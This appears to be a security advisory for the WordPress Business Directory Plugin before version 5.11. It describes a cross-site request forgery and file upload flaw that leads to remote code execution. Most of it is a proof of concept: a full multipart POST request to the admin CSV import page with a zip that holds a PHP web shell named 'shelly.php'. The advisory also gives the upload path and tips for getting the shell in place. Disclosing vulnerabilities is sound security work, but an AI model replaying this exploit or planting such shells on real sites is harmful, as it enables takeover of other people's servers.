Business Directory Plugin < 5.11 - Arbitrary File Upload to RCE

The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator import files. As the plugin also did not validate uploaded files, it could lead to RCE. Note (WPScanTeam): CSRF check and some file validation were added in v5.11, however a blacklist approach was used to forbid specific files (such as php), still allowing php4 to be uploaded by a high privilege user and a separate issue has been created for it

PoC

POST http://localhost/wp-admin/admin.php?page=wpbdp_admin_csv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------31004249213982265192075330464 Content-Length: 2653 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“action” do-import -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“csv-file”; filename=“Shop search - 1613143091.csv” Content-Type: application/vnd.ms-excel stuff,more stuff -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“images-file”; filename=“test.zip” Content-Type: application/x-zip-compressed PK  {UR$ó˜SU q shelly.php³±/È(PÈLÓÈ,.N-ÑP‰r u ‰VOÎMQÕÔ¬VHMÎÈWP²)(JµS²VP
Š+Ø*`ª´V(®,.IÍÕ ©Ð´†iÓ‡êKÉLµV¨µ· PK
   {UR$ó˜SU q $ shelly.php
 #É€×
#É€×
‰"=_×
PK

\ } -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[csv-file-separator]” , -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[images-separator]” ; -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[category-separator]” ; -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[post-status]” publish -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[existing-post-status]” preserve_status -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[create-missing-categories]” 1 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[append-images]” 1 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[assign-listings-to-user]” 1 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[default-user]” 1 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[batch-size]” 40 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“settings[disable-email-notifications]” 1 -----------------------------31004249213982265192075330464 Content-Disposition: form-data; name=“do-import” Import Listings -----------------------------31004249213982265192075330464-- Upload Path: wp-content/uploads/wpbdp-csv-imports/{last modified}/images/shelly.php The CSV file should be crafted a special way else you will get an error, however the files still get uploaded on error so it doesn’t matter. Just a heads up. Images can also be imported by a .ZIP file which you can place a .php file inside of.